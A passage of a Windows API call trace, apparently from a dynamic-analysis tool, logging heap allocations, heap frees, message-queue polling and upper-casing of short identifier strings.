wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.869] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0165.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0165.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0165.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.870] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0165.870] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0165.870] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0165.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0165.870] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0165.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0165.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0165.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0165.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0165.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0165.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0165.873] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.873] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0165.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.873] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0165.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0165.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0165.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0165.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.880] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.880] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.881] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.881] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.881] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0165.881] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0165.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.882] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.882] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.882] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0165.882] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0165.882] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.882] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.882] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.882] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.882] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.882] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0165.882] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.883] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0165.883] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.883] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.883] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.883] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.883] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.883] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.883] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.883] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.883] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0165.883] 